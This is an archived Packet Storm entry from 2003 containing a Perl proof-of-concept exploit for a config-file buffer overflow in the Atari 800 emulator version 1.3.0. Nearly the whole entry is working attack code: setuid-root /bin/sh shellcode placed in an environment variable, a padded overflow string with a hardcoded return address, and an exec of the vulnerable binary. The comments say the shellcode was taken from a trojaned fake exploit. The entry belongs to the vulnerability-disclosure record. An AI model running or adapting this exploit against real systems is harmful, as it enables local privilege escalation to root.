SynAtari800.pl

2003-08-05T00:00:00
ID PACKETSTORM:31487
Type packetstorm
Reporter OpTiKoOl
Modified 2003-08-05T00:00:00

Description

                                        
                                            `#!perl  
  
########################################################  
# PoC By OpTiKoOl, for Atari 800 Emulator, Version 1.3.0  
# based on   
# http://www.securityfocus.com/archive/1/331518/2003-08-01/2003-08-07/0  
# -  
# This PoC exploits a bof in parsing a very long config file ( > 250 bytes )  
# As in the advisory there's other bofs. but i just researched this one to  
# make a Proof-Of-Concept Code.   
# In Gentoo Linux (distro where this poc was developed) there isn't any suid  
# atari800 binaries. i suppose.. :D  
# -  
# Tested against Atari800 from portage.  
# OpTiKoOl@syners.org & OpTiKoOl@psyfreakz.org  
# -  
# Big kiss to Neuza ;* ehehe The Buf Smashing The Stack! lol  
# and a fucking shout to psychedelic ppl, you rockZ!  
# Stay Fresh!  
  
sub head {  
print "#####################################################  
# PoC against Atari 800 Emulator, Version 1.3.0  
# by OpTiKoOl\@syners.org and OpTiKoOl\@psyfreakz.org  
# 02/08/2003, CopyLeft by OpTiKoOl ...  
# http://www.syners.org/ & http://psyfreakz.org/  
# -  
# Big Kiss 2 Neuza ;* Chuak! Chuak!  
#\n";  
}  
  
# this sc was ripped from a fake (trojaned) exploit...  
# but this is a real shellcode, so enjoy :D  
  
$shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" #setuid 0  
. "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"  
. "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"  
. "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";  
  
$buf = "SYNERSOWNZ" x 25;  
$ENV{'SYNERS'} = $shellcode;  
$buf .= "\xad\xff\xff\xbf";  
&head;  
exec("/usr/bin/atari800 -config $buf");  
`